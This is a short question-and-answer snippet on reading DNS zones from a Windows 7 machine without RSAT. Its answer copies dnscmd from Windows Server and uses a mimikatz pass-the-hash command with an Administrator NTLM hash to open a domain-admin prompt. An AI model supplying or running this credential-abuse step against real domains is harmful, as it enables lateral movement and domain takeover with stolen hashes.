How can I remotely read DNS records from a Windows 7 machine that lacks RSAT?
First, copy two files from a Windows Server 2008 R2 system: `dnscmd.exe` to `C:\Windows\System32` and `dnscmd.exe.mui` to `C:\Windows\System32\en-US`. Then use mimikatz's Overpass-the-hash technique to spawn a command prompt with domain admin credentials (e.g., `sekurlsa::pth /user:Administrator /domain:test.com /ntlm:HASH`). In that prompt, run `Dnscmd <DNS_SERVER_FQDN> /EnumZones` to query the DNS server remotely. This method removes the need to install RSAT, as explained in the article on remote DLL loading.
remote DNS records, Overpass-the-hash, dnscmd, RSAT bypass, mimikatz